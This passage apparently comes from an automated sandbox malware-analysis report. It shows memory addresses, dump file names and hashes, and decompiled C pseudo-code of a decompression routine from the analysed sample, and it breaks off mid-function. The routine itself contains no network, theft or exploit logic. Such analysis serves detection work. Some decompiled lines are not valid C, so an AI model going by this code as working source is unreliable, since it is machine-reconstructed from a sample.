                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406617
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x0040624b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                          • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                                                                                                          • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                          • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406365, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406365() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
